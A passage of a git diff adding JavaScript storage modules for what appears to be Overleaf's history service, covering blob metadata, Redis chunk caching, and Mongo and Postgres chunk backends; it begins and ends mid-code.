binaryHashes) + + const blobs = records.map(recordToBlob) + return blobs +} + +/** + * Return metadata for all blobs in the given project + */ +async function getProjectBlobs(projectId) { + assert.postgresId(projectId, 'bad projectId') + projectId = parseInt(projectId, 10) + + const records = await knex('project_blobs') + .select('hash_bytes', 'byte_length', 'string_length') + .where({ + project_id: projectId, + }) + + const blobs = records.map(recordToBlob) + return blobs +} + +/** + * Return metadata for all blobs in the given project + * @param {Array<number>} projectIds + * @return {Promise<{ nBlobs: number, blobs: Map<number, Array<Blob>> }>} + */ +async function getProjectBlobsBatch(projectIds) { + for (const projectId of projectIds) { + assert.integer(projectId, 'bad projectId') + } + let nBlobs = 0 + const blobs = new Map() + if (projectIds.length === 0) return { nBlobs, blobs } + + const cursor = knex('project_blobs') + .select('project_id', 'hash_bytes', 'byte_length', 'string_length') + .whereIn('project_id', projectIds) + .stream() + for await (const record of cursor) { + const found = blobs.get(record.project_id) + if (found) { + found.push(recordToBlob(record)) + } else { + blobs.set(record.project_id, [recordToBlob(record)]) + } + nBlobs++ + } + return { nBlobs, blobs } +} + +/** + * Add a blob's metadata to the blobs table after it has been uploaded. + */ +async function insertBlob(projectId, blob) { + assert.postgresId(projectId, 'bad projectId') + projectId = parseInt(projectId, 10) + + await knex('project_blobs') + .insert(blobToRecord(projectId, blob)) + .onConflict(['project_id', 'hash_bytes']) + .ignore() +} + +/** + * Deletes all blobs for a given project + */ +async function deleteBlobs(projectId) { + assert.postgresId(projectId, 'bad projectId') + projectId = parseInt(projectId, 10) + + await knex('project_blobs').where('project_id', projectId).delete() +} + +function blobToRecord(projectId, blob) { + return { + project_id: projectId, + hash_bytes: hashToBuffer(blob.hash), + byte_length: blob.getByteLength(), + string_length: blob.getStringLength(), + } +} + +function recordToBlob(record) { + if (!record) return + return new Blob( + hashFromBuffer(record.hash_bytes), + record.byte_length, + record.string_length + ) +} + +function hashToBuffer(hash) { + if (!hash) return + return Buffer.from(hash, 'hex') +} + +function hashFromBuffer(buffer) { + if (!buffer) return + return buffer.toString('hex') +} + +module.exports = { + initialize, + findBlob, + findBlobs, + getProjectBlobs, + getProjectBlobsBatch, + insertBlob, + deleteBlobs, +} diff --git a/services/history-v1/storage/lib/chunk_buffer/index.js b/services/history-v1/storage/lib/chunk_buffer/index.js new file mode 100644 index 0000000..fe30b99 --- /dev/null +++ b/services/history-v1/storage/lib/chunk_buffer/index.js @@ -0,0 +1,40 @@ +'use strict' + +/** + * @module storage/lib/chunk_buffer + */ + +const chunkStore = require('../chunk_store') +const redisBackend = require('../chunk_store/redis') +const metrics = require('@overleaf/metrics') +/** + * Load the latest Chunk stored for a project, including blob metadata. + * + * @param {string} projectId + * @return {Promise.<Chunk>} + */ +async function loadLatest(projectId) { + const cachedChunk = await redisBackend.getCurrentChunk(projectId) + const chunkRecord = await chunkStore.loadLatestRaw(projectId) + const cachedChunkIsValid = redisBackend.checkCacheValidityWithMetadata( + cachedChunk, + chunkRecord + ) + if (cachedChunkIsValid) { + metrics.inc('chunk_buffer.loadLatest', 1, { + status: 'cache-hit', + }) + return cachedChunk + } else { + metrics.inc('chunk_buffer.loadLatest', 1, { + status: 'cache-miss', + }) + const chunk = await chunkStore.loadLatest(projectId) + await redisBackend.setCurrentChunk(projectId, chunk) + return chunk + } +} + +module.exports = { + loadLatest, +} diff --git a/services/history-v1/storage/lib/chunk_store/errors.js b/services/history-v1/storage/lib/chunk_store/errors.js new file mode 100644 index 0000000..5f0eba6 --- /dev/null +++ b/services/history-v1/storage/lib/chunk_store/errors.js @@ -0,0 +1,7 @@ +const OError = require('@overleaf/o-error') + +class ChunkVersionConflictError extends OError {} + +module.exports = { + ChunkVersionConflictError, +} diff --git a/services/history-v1/storage/lib/chunk_store/index.js b/services/history-v1/storage/lib/chunk_store/index.js new file mode 100644 index 0000000..f75c017 --- /dev/null +++ b/services/history-v1/storage/lib/chunk_store/index.js @@ -0,0 +1,447 @@ +// @ts-check + +'use strict' + +/** + * Manage {@link Chunk} and {@link History} storage. + * + * For storage, chunks are immutable. If we want to update a project with new + * changes, we create a new chunk record and History object and delete the old + * ones. If we compact a project's history, we similarly destroy the old chunk + * (or chunks) and replace them with a new one. This is helpful when using S3, + * because it guarantees only eventual consistency for updates but provides + * stronger consistency guarantees for object creation. + * + * When a chunk record in the database is removed, we save its ID for later + * in the `old_chunks` table, rather than deleting it immediately. This lets us + * use batch deletion to reduce the number of delete requests to S3. + * + * The chunk store also caches data about which blobs are referenced by each + * chunk, which allows us to find unused blobs without loading all of the data + * for all projects from S3. Whenever we create a chunk, we also insert records + * into the `chunk_blobs` table, to help with this bookkeeping. + */ + +const config = require('config') +const OError = require('@overleaf/o-error') +const { Chunk, History, Snapshot } = require('overleaf-editor-core') + +const assert = require('../assert') +const BatchBlobStore = require('../batch_blob_store') +const { BlobStore } = require('../blob_store') +const { historyStore } = require('../history_store') +const mongoBackend = require('./mongo') +const postgresBackend = require('./postgres') +const { ChunkVersionConflictError } = require('./errors') + +const DEFAULT_DELETE_BATCH_SIZE = parseInt(config.get('maxDeleteKeys'), 10) +const DEFAULT_DELETE_TIMEOUT_SECS = 3000 // 50 minutes +const DEFAULT_DELETE_MIN_AGE_SECS = 86400 // 1 day + +/** + * Create the initial chunk for a project. + */ +async function initializeProject(projectId, snapshot) { + if (projectId != null) { + assert.projectId(projectId, 'bad projectId') + } else { + projectId = await postgresBackend.generateProjectId() + } + + if (snapshot != null) { + assert.instance(snapshot, Snapshot, 'bad snapshot') + } else { + snapshot = new Snapshot() + } + + const blobStore = new BlobStore(projectId) + await blobStore.initialize() + + const backend = getBackend(projectId) + const chunkRecord = await backend.getLatestChunk(projectId) + if (chunkRecord != null) { + throw new AlreadyInitialized(projectId) + } + + const history = new History(snapshot, []) + const chunk = new Chunk(history, 0) + await create(projectId, chunk) + return projectId +} + +/** + * Load the blobs referenced in the given history + */ +async function lazyLoadHistoryFiles(history, batchBlobStore) { + const blobHashes = new Set() + history.findBlobHashes(blobHashes) + + await batchBlobStore.preload(Array.from(blobHashes)) + await history.loadFiles('lazy', batchBlobStore) +} + +/** + * Load the latest Chunk stored for a project, including blob metadata. + * + * @param {string} projectId + * @param {Object} [opts] + * @param {boolean} [opts.readOnly] + * @return {Promise<{id: string, startVersion: number, endVersion: number, endTimestamp: Date}>} + */ +async function loadLatestRaw(projectId, opts) { + assert.projectId(projectId, 'bad projectId') + + const backend = getBackend(projectId) + const chunkRecord = await backend.getLatestChunk(projectId, opts) + if (chunkRecord == null) { + throw new Chunk.NotFoundError(projectId) + } + return chunkRecord +} + +/** + * Load the latest Chunk stored for a project, including blob metadata. + * + * @param {string} projectId + * @return {Promise.<Chunk>} + */ +async function loadLatest(projectId) { + const chunkRecord = await loadLatestRaw(projectId) + const rawHistory = await historyStore.loadRaw(projectId, chunkRecord.id) + const history = History.fromRaw(rawHistory) + const blobStore = new BlobStore(projectId) + const batchBlobStore = new BatchBlobStore(blobStore) + await lazyLoadHistoryFiles(history, batchBlobStore) + return new Chunk(history, chunkRecord.startVersion) +} + +/** + * Load the the chunk that contains the given version, including blob metadata. + */ +async function loadAtVersion(projectId, version) { + assert.projectId(projectId, 'bad projectId') + assert.integer(version, 'bad version') + + const backend = getBackend(projectId) + const blobStore = new BlobStore(projectId) + const batchBlobStore = new BatchBlobStore(blobStore) + + const chunkRecord = await backend.getChunkForVersion(projectId, version) + const rawHistory = await historyStore.loadRaw(projectId, chunkRecord.id) + const history = History.fromRaw(rawHistory) + await lazyLoadHistoryFiles(history, batchBlobStore) + return new Chunk(history, chunkRecord.endVersion - history.countChanges()) +} + +/** + * Load the chunk that contains the version that was current at the given + * timestamp, including blob metadata. + */ +async function loadAtTimestamp(projectId, timestamp) { + assert.projectId(projectId, 'bad projectId') + assert.date(timestamp, 'bad timestamp') + + const backend = getBackend(projectId) + const blobStore = new BlobStore(projectId) + const batchBlobStore = new BatchBlobStore(blobStore) + + const chunkRecord = await backend.getChunkForTimestamp(projectId, timestamp) + const rawHistory = await historyStore.loadRaw(projectId, chunkRecord.id) + const history = History.fromRaw(rawHistory) + await lazyLoadHistoryFiles(history, batchBlobStore) + return new Chunk(history, chunkRecord.endVersion - history.countChanges()) +} + +/** + * Store the chunk and insert corresponding records in the database. + * + * @param {string} projectId + * @param {Chunk} chunk + * @param {Date} [earliestChangeTimestamp] + */ +async function create(projectId, chunk, earliestChangeTimestamp) { + assert.projectId(projectId, 'bad projectId') + assert.instance(chunk, Chunk, 'bad chunk') + assert.maybe.date(earliestChangeTimestamp, 'bad timestamp') + + const backend = getBackend(projectId) + const chunkStart = chunk.getStartVersion() + const chunkId = await uploadChunk(projectId, chunk) + + const opts = {} + if (chunkStart > 0) { + opts.oldChunkId = await getChunkIdForVersion(projectId, chunkStart - 1) + } + if (earliestChangeTimestamp != null) { + opts.earliestChangeTimestamp = earliestChangeTimestamp + } + + await backend.confirmCreate(projectId, chunk, chunkId, opts) +} + +/** + * Upload the given chunk to object storage. + * + * This is used by the create and update methods. + */ +async function uploadChunk(projectId, chunk) { + const backend = getBackend(projectId) + const blobStore = new BlobStore(projectId) + + const historyStoreConcurrency = parseInt( + config.get('chunkStore.historyStoreConcurrency'), + 10 + ) + + const rawHistory = await chunk + .getHistory() + .store(blobStore, historyStoreConcurrency) + const chunkId = await backend.insertPendingChunk(projectId, chunk) + await historyStore.storeRaw(projectId, chunkId, rawHistory) + return chunkId +} + +/** + * Extend the project's history by replacing the latest chunk with a new + * chunk. + * + * @param {string} projectId + * @param {number} oldEndVersion + * @param {Chunk} newChunk + * @param {Date} [earliestChangeTimestamp] + * @return {Promise} + */ +async function update( + projectId, + oldEndVersion, + newChunk, + earliestChangeTimestamp +) { + assert.projectId(projectId, 'bad projectId') + assert.integer(oldEndVersion, 'bad oldEndVersion') + assert.instance(newChunk, Chunk, 'bad newChunk') + assert.maybe.date(earliestChangeTimestamp, 'bad timestamp') + + const backend = getBackend(projectId) + const oldChunkId = await getChunkIdForVersion(projectId, oldEndVersion) + const newChunkId = await uploadChunk(projectId, newChunk) + + const opts = {} + if (earliestChangeTimestamp != null) { + opts.earliestChangeTimestamp = earliestChangeTimestamp + } + + await backend.confirmUpdate(projectId, oldChunkId, newChunk, newChunkId, opts) +} + +/** + * Find the chunk ID for a given version of a project. + * + * @param {string} projectId + * @param {number} version + * @return {Promise.<string>} + */ +async function getChunkIdForVersion(projectId, version) { + const backend = getBackend(projectId) + const chunkRecord = await backend.getChunkForVersion(projectId, version) + return chunkRecord.id +} + +/** + * Find the chunk metadata for a given version of a project. + * + * @param {string} projectId + * @param {number} version + * @return {Promise.<{id: string|number, startVersion: number, endVersion: number}>} + */ +async function getChunkMetadataForVersion(projectId, version) { + const backend = getBackend(projectId) + const chunkRecord = await backend.getChunkForVersion(projectId, version) + return chunkRecord +} + +/** + * Get all of a project's chunk ids + */ +async function getProjectChunkIds(projectId) { + const backend = getBackend(projectId) + const chunkIds = await backend.getProjectChunkIds(projectId) + return chunkIds +} + +/** + * Get all of a projects chunks directly + */ +async function getProjectChunks(projectId) { + const backend = getBackend(projectId) + const chunkIds = await backend.getProjectChunks(projectId) + return chunkIds +} + +/** + * Load the chunk for a given chunk record, including blob metadata. + */ +async function loadByChunkRecord(projectId, chunkRecord) { + const blobStore = new BlobStore(projectId) + const batchBlobStore = new BatchBlobStore(blobStore) + const { raw: rawHistory, buffer: chunkBuffer } = + await historyStore.loadRawWithBuffer(projectId, chunkRecord.id) + const history = History.fromRaw(rawHistory) + await lazyLoadHistoryFiles(history, batchBlobStore) + return { + chunk: new Chunk(history, chunkRecord.endVersion - history.countChanges()), + chunkBuffer, + } +} + +/** + * Asynchronously retrieves project chunks starting from a specific version. + * + * This generator function yields chunk records for a given project starting from the specified version (inclusive). + * It continues to fetch and yield subsequent chunk records until the end version of the latest chunk metadata is reached. + * If you want to fetch all the chunks *after* a version V, call this function with V+1. + * + * @param {string} projectId - The ID of the project. + * @param {number} version - The starting version to retrieve chunks from. + * @returns {AsyncGenerator<Object, void, undefined>} An async generator that yields chunk records. + */ +async function* getProjectChunksFromVersion(projectId, version) { + const backend = getBackend(projectId) + const latestChunkMetadata = await loadLatestRaw(projectId) + if (!latestChunkMetadata || version > latestChunkMetadata.endVersion) { + return + } + let chunkRecord = await backend.getChunkForVersion(projectId, version) + while (chunkRecord != null) { + yield chunkRecord + if (chunkRecord.endVersion >= latestChunkMetadata.endVersion) { + break + } else { + chunkRecord = await backend.getChunkForVersion( + projectId, + chunkRecord.endVersion + 1 + ) + } + } +} + +/** + * Delete the given chunk from the database. + * + * This doesn't delete the chunk from object storage yet. The old chunks + * collection will do that. + */ +async function destroy(projectId, chunkId) { + const backend = getBackend(projectId) + await backend.deleteChunk(projectId, chunkId) +} + +/** + * Delete all of a project's chunks from the database. + */ +async function deleteProjectChunks(projectId) { + const backend = getBackend(projectId) + await backend.deleteProjectChunks(projectId) +} + +/** + * Delete a given number of old chunks from both the database + * and from object storage. + * + * @param {object} options + * @param {number} [options.batchSize] - number of chunks to delete in each + * batch + * @param {number} [options.maxBatches] - maximum number of batches to process + * @param {number} [options.minAgeSecs] - minimum age of chunks to delete + * @param {number} [options.timeout] - maximum time to spend deleting chunks + * + * @return {Promise<number>} number of chunks deleted + */ +async function deleteOldChunks(options = {}) { + const batchSize = options.batchSize ?? DEFAULT_DELETE_BATCH_SIZE + const maxBatches = options.maxBatches ?? Number.MAX_SAFE_INTEGER + const minAgeSecs = options.minAgeSecs ?? DEFAULT_DELETE_MIN_AGE_SECS + const timeout = options.timeout ?? DEFAULT_DELETE_TIMEOUT_SECS + assert.greater(batchSize, 0) + assert.greater(timeout, 0) + assert.greater(maxBatches, 0) + assert.greaterOrEqual(minAgeSecs, 0) + + const timeoutAfter = Date.now() + timeout * 1000 + let deletedChunksTotal = 0 + for (const backend of [postgresBackend, mongoBackend]) { + for (let i = 0; i < maxBatches; i++) { + if (Date.now() > timeoutAfter) { + break + } + const deletedChunks = await deleteOldChunksBatch( + backend, + batchSize, + minAgeSecs + ) + deletedChunksTotal += deletedChunks.length + if (deletedChunks.length !== batchSize) { + // Last batch was incomplete. There probably are no old chunks left + break + } + } + } + return deletedChunksTotal +} + +async function deleteOldChunksBatch(backend, count, minAgeSecs) { + assert.greater(count, 0, 'bad count') + assert.greaterOrEqual(minAgeSecs, 0, 'bad minAgeSecs') + + const oldChunks = await backend.getOldChunksBatch(count, minAgeSecs) + if (oldChunks.length === 0) { + return [] + } + await historyStore.deleteChunks(oldChunks) + await backend.deleteOldChunks(oldChunks.map(chunk => chunk.chunkId)) + return oldChunks +} + +/** + * Returns the appropriate backend for the given project id + * + * Numeric ids use the Postgres backend. + * Strings of 24 characters use the Mongo backend. + */ +function getBackend(projectId) { + if (assert.POSTGRES_ID_REGEXP.test(projectId)) { + return postgresBackend + } else if (assert.MONGO_ID_REGEXP.test(projectId)) { + return mongoBackend + } else { + throw new OError('bad project id', { projectId }) + } +} + +class AlreadyInitialized extends OError { + constructor(projectId) { + super('Project is already initialized', { projectId }) + } +} + +module.exports = { + getBackend, + initializeProject, + loadLatest, + loadLatestRaw, + loadAtVersion, + loadAtTimestamp, + loadByChunkRecord, + create, + update, + destroy, + getChunkIdForVersion, + getChunkMetadataForVersion, + getProjectChunkIds, + getProjectChunks, + getProjectChunksFromVersion, + deleteProjectChunks, + deleteOldChunks, + AlreadyInitialized, + ChunkVersionConflictError, +} diff --git a/services/history-v1/storage/lib/chunk_store/mongo.js b/services/history-v1/storage/lib/chunk_store/mongo.js new file mode 100644 index 0000000..a34b719 --- /dev/null +++ b/services/history-v1/storage/lib/chunk_store/mongo.js @@ -0,0 +1,526 @@ +// @ts-check + +const { ObjectId, ReadPreference, MongoError } = require('mongodb') +const { Chunk } = require('overleaf-editor-core') +const OError = require('@overleaf/o-error') +const assert = require('../assert') +const mongodb = require('../mongodb') +const { ChunkVersionConflictError } = require('./errors') + +const DUPLICATE_KEY_ERROR_CODE = 11000 + +/** + * @import { ClientSession } from 'mongodb' + */ + +/** + * Get the latest chunk's metadata from the database + * @param {string} projectId + * @param {Object} [opts] + * @param {boolean} [opts.readOnly] + */ +async function getLatestChunk(projectId, opts = {}) { + assert.mongoId(projectId, 'bad projectId') + const { readOnly = false } = opts + + const record = await mongodb.chunks.findOne( + { + projectId: new ObjectId(projectId), + state: { $in: ['active', 'closed'] }, + }, + { + sort: { startVersion: -1 }, + readPreference: readOnly + ? ReadPreference.secondaryPreferred + : ReadPreference.primary, + } + ) + if (record == null) { + return null + } + return chunkFromRecord(record) +} + +/** + * Get the metadata for the chunk that contains the given version. + */ +async function getChunkForVersion(projectId, version) { + assert.mongoId(projectId, 'bad projectId') + assert.integer(version, 'bad version') + + const record = await mongodb.chunks.findOne( + { + projectId: new ObjectId(projectId), + state: { $in: ['active', 'closed'] }, + startVersion: { $lte: version }, + endVersion: { $gte: version }, + }, + { sort: { startVersion: 1 } } + ) + if (record == null) { + throw new Chunk.VersionNotFoundError(projectId, version) + } + return chunkFromRecord(record) +} + +/** + * Get the metadata for the chunk that contains the given version before the endTime. + */ +async function getFirstChunkBeforeTimestamp(projectId, timestamp) { + assert.mongoId(projectId, 'bad projectId') + assert.date(timestamp, 'bad timestamp') + + const recordActive = await getChunkForVersion(projectId, 0) + if (recordActive && recordActive.endTimestamp <= timestamp) { + return recordActive + } + + // fallback to deleted chunk + const recordDeleted = await mongodb.chunks.findOne( + { + projectId: new ObjectId(projectId), + state: 'deleted', + startVersion: 0, + updatedAt: { $lte: timestamp }, // indexed for state=deleted + endTimestamp: { $lte: timestamp }, + }, + { sort: { updatedAt: -1 } } + ) + if (recordDeleted) { + return chunkFromRecord(recordDeleted) + } + throw new Chunk.BeforeTimestampNotFoundError(projectId, timestamp) +} + +/** + * Get the metadata for the chunk that contains the version that was current at + * the given timestamp. + */ +async function getChunkForTimestamp(projectId, timestamp) { + assert.mongoId(projectId, 'bad projectId') + assert.date(timestamp, 'bad timestamp') + + const record = await mongodb.chunks.findOne( + { + projectId: new ObjectId(projectId), + state: { $in: ['active', 'closed'] }, + endTimestamp: { $gte: timestamp }, + }, + // We use the index on the startVersion for sorting records. This assumes + // that timestamps go up with each version. + { sort: { startVersion: 1 } } + ) + + if (record == null) { + // Couldn't find a chunk that had modifications after the given timestamp. + // Fetch the latest chunk instead. + const chunk = await getLatestChunk(projectId) + if (chunk == null) { + throw new Chunk.BeforeTimestampNotFoundError(projectId, timestamp) + } + return chunk + } + + return chunkFromRecord(record) +} + +/** + * Get the metadata for the chunk that contains the version that was current before + * the given timestamp. + */ +async function getLastActiveChunkBeforeTimestamp(projectId, timestamp) { + assert.mongoId(projectId, 'bad projectId') + assert.date(timestamp, 'bad timestamp') + + const record = await mongodb.chunks.findOne( + { + projectId: new ObjectId(projectId), + state: { $in: ['active', 'closed'] }, + $or: [ + { + endTimestamp: { + $lte: timestamp, + }, + }, + { + endTimestamp: null, + }, + ], + }, + // We use the index on the startVersion for sorting records. This assumes + // that timestamps go up with each version. + { sort: { startVersion: -1 } } + ) + if (record == null) { + throw new Chunk.BeforeTimestampNotFoundError(projectId, timestamp) + } + return chunkFromRecord(record) +} + +/** + * Get all of a project's chunk ids + */ +async function getProjectChunkIds(projectId) { + assert.mongoId(projectId, 'bad projectId') + + const cursor = mongodb.chunks.find( + { + projectId: new ObjectId(projectId), + state: { $in: ['active', 'closed'] }, + }, + { projection: { _id: 1 } } + ) + return await cursor.map(record => record._id).toArray() +} + +/** + * Get all of a projects chunks directly + */ +async function getProjectChunks(projectId) { + assert.mongoId(projectId, 'bad projectId') + + const cursor = mongodb.chunks + .find( + { + projectId: new ObjectId(projectId), + state: { $in: ['active', 'closed'] }, + }, + { projection: { state: 0 } } + ) + .sort({ startVersion: 1 }) + return await cursor.map(chunkFromRecord).toArray() +} + +/** + * Insert a pending chunk before sending it to object storage. + */ +async function insertPendingChunk(projectId, chunk) { + assert.mongoId(projectId, 'bad projectId') + assert.instance(chunk, Chunk, 'bad chunk') + + const chunkId = new ObjectId() + await mongodb.chunks.insertOne({ + _id: chunkId, + projectId: new ObjectId(projectId), + startVersion: chunk.getStartVersion(), + endVersion: chunk.getEndVersion(), + endTimestamp: chunk.getEndTimestamp(), + state: 'pending', + updatedAt: new Date(), + }) + return chunkId.toString() +} + +/** + * Record that a new chunk was created. + * + * @param {string} projectId + * @param {Chunk} chunk + * @param {string} chunkId + * @param {object} opts + * @param {Date} [opts.earliestChangeTimestamp] + * @param {string} [opts.oldChunkId] + */ +async function confirmCreate(projectId, chunk, chunkId, opts = {}) { + assert.mongoId(projectId, 'bad projectId') + assert.instance(chunk, Chunk, 'bad newChunk') + assert.mongoId(chunkId, 'bad newChunkId') + + await mongodb.client.withSession(async session => { + await session.withTransaction(async () => { + if (opts.oldChunkId != null) { + await closeChunk(projectId, opts.oldChunkId, { session }) + } + + await activateChunk(projectId, chunkId, { session }) + + await updateProjectRecord( + projectId, + chunk, + opts.earliestChangeTimestamp, + { session } + ) + }) + }) +} + +/** + * Write the metadata to the project record + */ +async function updateProjectRecord( + projectId, + chunk, + earliestChangeTimestamp, + mongoOpts = {} +) { + // record the end version against the project + await mongodb.projects.updateOne( + { + 'overleaf.history.id': projectId, // string for Object ids, number for postgres ids + }, + { + // always store the latest end version and timestamp for the chunk + $max: { + 'overleaf.history.currentEndVersion': chunk.getEndVersion(), + 'overleaf.history.currentEndTimestamp': chunk.getEndTimestamp(), + 'overleaf.history.updatedAt': new Date(), + }, + // store the first pending change timestamp for the chunk, this will + // be cleared every time a backup is completed. + $min: { + 'overleaf.backup.pendingChangeAt': + earliestChangeTimestamp || chunk.getEndTimestamp() || new Date(), + }, + }, + mongoOpts + ) +} + +/** + * Record that a chunk was replaced by a new one. + * + * @param {string} projectId + * @param {string} oldChunkId + * @param {Chunk} newChunk + * @param {string} newChunkId + * @param {object} [opts] + * @param {Date} [opts.earliestChangeTimestamp] + */ +async function confirmUpdate( + projectId, + oldChunkId, + newChunk, + newChunkId, + opts = {} +) { + assert.mongoId(projectId, 'bad projectId') + assert.mongoId(oldChunkId, 'bad oldChunkId') + assert.instance(newChunk, Chunk, 'bad newChunk') + assert.mongoId(newChunkId, 'bad newChunkId') + + await mongodb.client.withSession(async session => { + await session.withTransaction(async () => { + await deleteActiveChunk(projectId, oldChunkId, { session }) + + await activateChunk(projectId, newChunkId, { session }) + + await updateProjectRecord( + projectId, + newChunk, + opts.earliestChangeTimestamp, + { session } + ) + }) + }) +} + +/** + * Activate a pending chunk + * + * @param {string} projectId + * @param {string} chunkId + * @param {object} [opts] + * @param {ClientSession} [opts.session] + */ +async function activateChunk(projectId, chunkId, opts = {}) { + assert.mongoId(projectId, 'bad projectId') + assert.mongoId(chunkId, 'bad chunkId') + + let result + try { + result = await mongodb.chunks.updateOne( + { + _id: new ObjectId(chunkId), + projectId: new ObjectId(projectId), + state: 'pending', + }, + { $set: { state: 'active', updatedAt: new Date() } }, + opts + ) + } catch (err) { + if (err instanceof MongoError && err.code === DUPLICATE_KEY_ERROR_CODE) { + throw new ChunkVersionConflictError('chunk start version is not unique', { + projectId, + chunkId, + }) + } else { + throw err + } + } + if (result.matchedCount === 0) { + throw new OError('pending chunk not found', { projectId, chunkId }) + } +} + +/** + * Close a chunk + * + * A closed chunk is one that can't be extended anymore. + * + * @param {string} projectId + * @param {string} chunkId + * @param {object} [opts] + * @param {ClientSession} [opts.session] + */ +async function closeChunk(projectId, chunkId, opts = {}) { + const result = await mongodb.chunks.updateOne( + { + _id: new ObjectId(chunkId), + projectId: new ObjectId(projectId), + state: 'active', + }, + { $set: { state: 'closed' } }, + opts + ) + + if (result.matchedCount === 0) { + throw new ChunkVersionConflictError('unable to close chunk', { + projectId, + chunkId, + }) + } +} + +/** + * Delete an active chunk + * + * This is used to delete chunks that are in the process of being extended. It + * will refuse to delete chunks that are already closed and can therefore not be + * extended. + * + * @param {string} projectId + * @param {string} chunkId + * @param {object} [opts] + * @param {ClientSession} [opts.session] + */ +async function deleteActiveChunk(projectId, chunkId, opts = {}) { + const updateResult = await mongodb.chunks.updateOne( + { + _id: new ObjectId(chunkId), + projectId: new ObjectId(projectId), + state: 'active', + }, + { $set: { state: 'deleted', updatedAt: new Date() } }, + opts + ) + + if (updateResult.matchedCount === 0) { + throw new ChunkVersionConflictError('unable to delete active chunk', { + projectId, + chunkId, + }) + } +} + +/** + * Delete a chunk. + * + * @param {string} projectId + * @param {string} chunkId + * @return {Promise} + */ +async function deleteChunk(projectId, chunkId, mongoOpts = {}) { + assert.mongoId(projectId, 'bad projectId') + assert.mongoId(chunkId, 'bad chunkId') + + await mongodb.chunks.updateOne( + { _id: new ObjectId(chunkId), projectId: new ObjectId(projectId) }, + { $set: { state: 'deleted', updatedAt: new Date() } }, + mongoOpts + ) +} + +/** + * Delete all of a project's chunks + */ +async function deleteProjectChunks(projectId) { + assert.mongoId(projectId, 'bad projectId') + + await mongodb.chunks.updateMany( + { + projectId: new ObjectId(projectId), + state: { $in: ['active', 'closed'] }, + }, + { $set: { state: 'deleted', updatedAt: new Date() } } + ) +} + +/** + * Get a batch of old chunks for deletion + */ +async function getOldChunksBatch(count, minAgeSecs) { + const maxUpdatedAt = new Date(Date.now() - minAgeSecs * 1000) + const batch = [] + + // We need to fetch one state at a time to take advantage of the partial + // indexes on the chunks collection. + // + // Mongo 6.0 allows partial indexes that use the $in operator. When we reach + // that Mongo version, we can create a partial index on both the deleted and + // pending states and simplify this logic a bit. + for (const state of ['deleted', 'pending']) { + if (count === 0) { + // There's no more space in the batch + break + } + + const cursor = mongodb.chunks + .find( + { state, updatedAt: { $lt: maxUpdatedAt } }, + { + limit: count, + projection: { _id: 1, projectId: 1 }, + } + ) + .map(record => ({ + chunkId: record._id.toString(), + projectId: record.projectId.toString(), + })) + + for await (const record of cursor) { + batch.push(record) + count -= 1 + } + } + return batch +} + +/** + * Delete a batch of old chunks from the database + */ +async function deleteOldChunks(chunkIds) { + await mongodb.chunks.deleteMany({ + _id: { $in: chunkIds.map(id => new ObjectId(id)) }, + state: { $in: ['deleted', 'pending'] }, + }) +} + +/** + * Build a chunk metadata object from the database record + */ +function chunkFromRecord(record) { + return { + id: record._id.toString(), + startVersion: record.startVersion, + endVersion: record.endVersion, + endTimestamp: record.endTimestamp, + } +} + +module.exports = { + getLatestChunk, + getFirstChunkBeforeTimestamp, + getLastActiveChunkBeforeTimestamp, + getChunkForVersion, + getChunkForTimestamp, + getProjectChunkIds, + getProjectChunks, + insertPendingChunk, + confirmCreate, + confirmUpdate, + updateProjectRecord, + deleteChunk, + deleteProjectChunks, + getOldChunksBatch, + deleteOldChunks, +} diff --git a/services/history-v1/storage/lib/chunk_store/postgres.js b/services/history-v1/storage/lib/chunk_store/postgres.js new file mode 100644 index 0000000..0c33c0f --- /dev/null +++ b/services/history-v1/storage/lib/chunk_store/postgres.js @@ -0,0 +1,487 @@ +// @ts-check + +const { Chunk } = require('overleaf-editor-core') +const assert = require('../assert') +const knex = require('../knex') +const knexReadOnly = require('../knex_read_only') +const { ChunkVersionConflictError } = require('./errors') +const { updateProjectRecord } = require('./mongo') + +const DUPLICATE_KEY_ERROR_CODE = '23505' + +/** + * @import { Knex } from 'knex' + */ + +/** + * Get the latest chunk's metadata from the database + * @param {string} projectId + * @param {Object} [opts] + * @param {boolean} [opts.readOnly] + */ +async function getLatestChunk(projectId, opts = {}) { + assert.postgresId(projectId, 'bad projectId') + const { readOnly = false } = opts + + const record = await (readOnly ? knexReadOnly : knex)('chunks') + .where('doc_id', parseInt(projectId, 10)) + .orderBy('end_version', 'desc') + .first() + if (record == null) { + return null + } + return chunkFromRecord(record) +} + +/** + * Get the metadata for the chunk that contains the given version. + * + * @param {string} projectId + * @param {number} version + */ +async function getChunkForVersion(projectId, version) { + assert.postgresId(projectId, 'bad projectId') + + const record = await knex('chunks') + .where('doc_id', parseInt(projectId, 10)) + .where('end_version', '>=', version) + .orderBy('end_version') + .first() + if (!record) { + throw new Chunk.VersionNotFoundError(projectId, version) + } + return chunkFromRecord(record) +} + +/** + * Get the metadata for the chunk that contains the given version. + * + * @param {string} projectId + * @param {Date} timestamp + */ +async function getFirstChunkBeforeTimestamp(projectId, timestamp) { + assert.date(timestamp, 'bad timestamp') + + const recordActive = await getChunkForVersion(projectId, 0) + + // projectId must be valid if getChunkForVersion did not throw + if (recordActive && recordActive.endTimestamp <= timestamp) { + return recordActive + } + + // fallback to deleted chunk + const recordDeleted = await knex('old_chunks') + .where('doc_id', parseInt(projectId, 10)) + .where('start_version', '=', 0) + .where('end_timestamp', '<=', timestamp) + .orderBy('end_version', 'desc') + .first() + if (recordDeleted) { + return chunkFromRecord(recordDeleted) + } + throw new Chunk.BeforeTimestampNotFoundError(projectId, timestamp) +} + +/** + * Get the metadata for the chunk that contains the version that was current at + * the given timestamp. + * + * @param {string} projectId + * @param {Date} timestamp + */ +async function getLastActiveChunkBeforeTimestamp(projectId, timestamp) { + assert.date(timestamp, 'bad timestamp') + assert.postgresId(projectId, 'bad projectId') + + const query = knex('chunks') + .where('doc_id', parseInt(projectId, 10)) + .where(function () { + this.where('end_timestamp', '<=', timestamp).orWhere( + 'end_timestamp', + null + ) + }) + .orderBy('end_version', 'desc', 'last') + + const record = await query.first() + + if (!record) { + throw new Chunk.BeforeTimestampNotFoundError(projectId, timestamp) + } + return chunkFromRecord(record) +} + +/** + * Get the metadata for the chunk that contains the version that was current at + * the given timestamp. + * + * @param {string} projectId + * @param {Date} timestamp + */ +async function getChunkForTimestamp(projectId, timestamp) { + assert.postgresId(projectId, 'bad projectId') + + // This query will find the latest chunk after the timestamp (query orders + // in reverse chronological order), OR the latest chunk + // This accounts for the case where the timestamp is ahead of the chunk's + // timestamp and therefore will not return any results + const 